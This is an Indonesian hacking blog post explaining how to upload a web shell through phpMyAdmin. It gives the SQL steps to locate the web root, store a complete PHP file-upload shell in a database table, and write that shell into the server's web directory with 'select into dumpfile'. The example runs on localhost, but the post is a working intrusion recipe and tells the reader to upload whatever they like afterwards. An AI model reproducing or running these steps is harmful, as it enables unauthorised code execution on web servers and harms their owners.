Ticker

10/recent/ticker-posts

Ad Code

Responsive Advertisement

Upload Shell dari PHPMYADMIN Via 1 File

H4nk Maret 10, 2011

Hehehe masih bermain2 dengan namanya pHpmyadmin.. kali ini cara upload shell dari phpmyadmin dengan menggunakan 1 file. Masih ingat pada artikel saya sebelumnya Script Upload dengan satu File


Nah ini adalah permintaan dari salah satu teman yaitu Sarang Gane ,


Kali ini saya hanya memberikan sebuah contoh pada localhost, karena malas memberikan contoh pada web orang :D. Keep your spirited eh..


Di harapkan anda sudah masuk PHPMYADMIN, bagi websitenya masih terbuka lebar PHPMYADMINnya silahkan memberikan autentifikasi pada login PHPMyAdmin bisa membacanya pada artikel saya sebelumnya Memberikan Halaman Autentikasi Pada PHPMyAdmin


Langkah pertama kita musti tahu dimana lokasi rootnya terlebih dahulu..


SHOW VARIABLES




Basedirnya terletak pada E:\^XmoenseN^\H4nk_SERVER\mysql\


Menurut mata batin H4nk lokasi diktorinya ada di :


E:\^XmoenseN^\H4nk_SERVER\www


Lokasi diktorinya sudah dapat. Saatnya membuat sebuah database





Disini saya membuat nama database dengan xmoensen. Untuk kode Mysqlnya adalah : CREATE DATABASE `xmoensen` ;


Database sudah siap. Sekarang buat table


INSERT INTO `xmoensen`.`h4nk` (
`shell`
)
VALUES (
'<title>Upload By H4nk</title>
<style type="text/css">
<!--
body,td,th {
color: #0F0;
}
body {
background-color: #999;
}
-->
</style><p>
<form method="POST" action="" enctype="multipart/form-data" >
<input type="file" name="file" />
<input type="submit" value="Upload" />
</form>
<p>
<strong>
<?php
if ($_FILES[''file''] != '''') {
copy($_FILES[''file''][''tmp_name''], $_FILES[''file''][''name'']) or die (''Proses upload Gagal: '');
}else {
die(''Silahkan pilih file'');
}
?>
File berhasil diupload:<br />
Keterangan File:<br />
Nama File: <?php echo $_FILES[''file''][''name'']; ?><br />
Ukuran File: <?php echo $_FILES[''file''][''size''];?> Bytes <br />
Jenis File: <?php echo $_FILES[''file''][''type'']; ?></strong></p>
<h4><br />
Powered by <a href="http://h4nk.net">H4nk</a></h4>
'
);
maka table aka terbentuk di dalam table tadi yang bernama h4nk dengan field shell

sampai disini hanya hanya sekedar script saja belum bisa membuat sebuah file php.

Dengan itu kita akan memberikan perintah sql sebagai berikut :

select * into dumpfile 'E:/^XmoenseN^/H4nk_SERVER/www/h4nk_upload.php' from h4nk

'E:/^XmoenseN^/H4nk_SERVER/www/ << adalah diktori yang mana sudah kita ketahuan tadi..

h4nk_upload.php <= nama file yang nanti akan di buat ..





Jika sukses akan seperti ini pesannya :





Sekarang coba anda melakukan browsing :





Bingo… file upload berhasil masuk.. sekarang terserah anda mau ngpain.. mau upload poto2 narsis anda atau mau upload yang lain… oke deh sampai di sini aja dulu triknya.. semoga bermanfaat..


Thanks To : kang Nathan And Sarang gane

H4nk

Diposting oleh H4nk

Posting Komentar

0 Komentar

Berikan Komentar yang bermanfaat dan sehat.